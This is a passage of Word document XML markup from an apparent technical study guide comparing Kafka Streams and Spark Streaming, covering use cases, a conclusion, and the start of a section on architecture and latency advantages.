    <w:p w14:paraId="7A383E5F" w14:textId="77777777" w:rsidR="00612285" w:rsidRPr="0003272F" w:rsidRDefault="0061228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Use Kafka Streams When:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ABDB06E" w14:textId="77777777" w:rsidR="00612285" w:rsidRPr="0003272F" w:rsidRDefault="00612285" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="151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You need to process data streams in </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>real-time</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and handle each record immediately.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A2657C9" w14:textId="77777777" w:rsidR="00612285" w:rsidRPr="0003272F" w:rsidRDefault="00612285" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="151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You want </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>seamless integration with Kafka</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> as the messaging system.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C027C1B" w14:textId="77777777" w:rsidR="00612285" w:rsidRPr="0003272F" w:rsidRDefault="00612285" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="151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Your system is lightweight and doesn’t require large-scale distributed processing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="365FF997" w14:textId="77777777" w:rsidR="00612285" w:rsidRPr="0003272F" w:rsidRDefault="00612285" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1515"/>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Your processing logic can be efficiently expressed in terms of stream operations (e.g., filters, joins, aggregations).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AF6F158" w14:textId="77777777" w:rsidR="00612285" w:rsidRPr="0003272F" w:rsidRDefault="0061228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Use Spark Streaming When:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E958E7E" w14:textId="77777777" w:rsidR="00612285" w:rsidRPr="0003272F" w:rsidRDefault="00612285" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="151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You need </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>large-scale distributed processing</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and plan to leverage Spark’s broader capabilities (e.g., machine learning, graph processing, SQL).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A88433B" w14:textId="77777777" w:rsidR="00612285" w:rsidRPr="0003272F" w:rsidRDefault="00612285" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="151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Your use case involves complex computations and aggregations on large datasets that are best handled in </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>micro-batches</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7887DE89" w14:textId="77777777" w:rsidR="00612285" w:rsidRPr="0003272F" w:rsidRDefault="00612285" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1516"/>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lastRenderedPageBreak/>
        <w:t xml:space="preserve">Your application involves </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>advanced analytics</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, and you need to scale to handle petabytes of data across clusters.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F711F24" w14:textId="77777777" w:rsidR="00612285" w:rsidRPr="0003272F" w:rsidRDefault="00000000" w:rsidP="0003272F">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4813523">
          <v:rect id="_x0000_i3226" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="01C454D0" w14:textId="77777777" w:rsidR="00612285" w:rsidRPr="0003272F" w:rsidRDefault="00612285" w:rsidP="0003272F">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>6. Conclusion:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63F673E5" w14:textId="77777777" w:rsidR="00612285" w:rsidRPr="0003272F" w:rsidRDefault="00612285" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="151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Kafka Streams</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is a more lightweight, low-latency solution that is well-suited for applications that directly use Kafka as their primary messaging system.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00C90B36" w14:textId="77777777" w:rsidR="00612285" w:rsidRPr="0003272F" w:rsidRDefault="00612285" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1517"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Spark Streaming</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is more powerful for large-scale, distributed stream processing and is ideal when complex computations or integration with Spark’s ecosystem are required.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BBFDA21" w14:textId="77777777" w:rsidR="00612285" w:rsidRPr="0003272F" w:rsidRDefault="00612285" w:rsidP="0003272F">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Each solution excels in its niche, so your choice will depend on your </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>use case</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>infrastructure</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, and </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>real-time data processing requirements</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E575C9A" w14:textId="7AB28BDD"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9783137">
          <v:rect id="_x0000_i3227" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="28888399" w14:textId="54B54421" w:rsidR="007C61B8" w:rsidRPr="00CE4B95" w:rsidRDefault="0065419A" w:rsidP="00DB22BB">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="807" w:name="_Toc196308287"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Compare Kafka Streams with Spark Streaming, highlighting the advantages of using Kafka Streams for real-time stream processing</w:t>
      </w:r>
      <w:r w:rsidR="007C61B8" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="807"/>
    </w:p>
    <w:p w14:paraId="01E55BD8" w14:textId="042FD0B8" w:rsidR="001B47F3" w:rsidRPr="004269A3" w:rsidRDefault="001B47F3" w:rsidP="004269A3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>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Comparison of Kafka Streams vs. Spark Streaming:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57012D9B" w14:textId="77777777" w:rsidR="001B47F3" w:rsidRPr="004269A3" w:rsidRDefault="001B47F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Both </w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Kafka Streams</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Spark Streaming</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> are popular frameworks for real-time stream processing, but they serve different use cases and have distinct features. Here’s a detailed comparison highlighting the </w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>advantages</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> of using </w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Kafka Streams</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> for real-time stream processing:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="633F7FBB" w14:textId="77777777" w:rsidR="001B47F3"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7435F4C">
          <v:rect id="_x0000_i3228" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="16141369"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1. Architecture and Integration:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B395AE5"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Kafka Streams:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0260BC11" w14:textId="77777777" w:rsidR="001B47F3" w:rsidRPr="004269A3" w:rsidRDefault="001B47F3" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="151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Built for Kafka</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: Kafka Streams is </w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>native</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to Kafka, designed to process data directly from </w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Kafka topics</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> without needing a separate cluster for stream processing. It integrates seamlessly with Kafka, making it the natural choice for stream processing within the Kafka ecosystem.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="541B867B" w14:textId="77777777" w:rsidR="001B47F3" w:rsidRPr="004269A3" w:rsidRDefault="001B47F3" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="151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Embedded Processing</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: Kafka Streams runs </w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>within the application itself</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (as part of the JVM), meaning that you don’t need an external processing cluster (like Spark), making it lightweight and simple to deploy.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F030044"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Spark Streaming:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="712E0A8A" w14:textId="77777777" w:rsidR="001B47F3" w:rsidRPr="004269A3" w:rsidRDefault="001B47F3" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="151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Requires Spark Cluster</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: Spark Streaming is part of the </w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Apache Spark</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> ecosystem and typically requires a Spark cluster for distributed processing. It is </w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>not natively built for Kafka</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> but can consume Kafka data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E57482C" w14:textId="77777777" w:rsidR="001B47F3" w:rsidRPr="004269A3" w:rsidRDefault="001B47F3" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="151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Micro-batching</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: Spark Streaming processes data in </w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>micro-batches</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (with defined time windows), requiring significant computational resources and infrastructure, making it more complex to deploy than Kafka Streams.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45787329"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Advantage of Kafka Streams:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38E6C80F" w14:textId="77777777" w:rsidR="001B47F3" w:rsidRPr="004269A3" w:rsidRDefault="001B47F3" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="152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Easier integration</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> with Kafka topics, no need for external cluster infrastructure.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0895AAF7" w14:textId="77777777" w:rsidR="001B47F3" w:rsidRPr="004269A3" w:rsidRDefault="001B47F3" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="152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Directly runs within your application</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, meaning less overhead and simpler deployment compared to Spark Streaming’s cluster-based architecture.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70CC6C17" w14:textId="77777777" w:rsidR="001B47F3"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EABC551">
          <v:rect id="_x0000_i3229" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D5BAE8E"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2. Latency and Real-Time Processing:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="714475B1"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Kafka Streams:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A640E18" w14:textId="77777777" w:rsidR="001B47F3" w:rsidRPr="004269A3" w:rsidRDefault="001B47F3" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="152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Low Latency</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: Kafka Streams processes data as it arrives, providing </w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
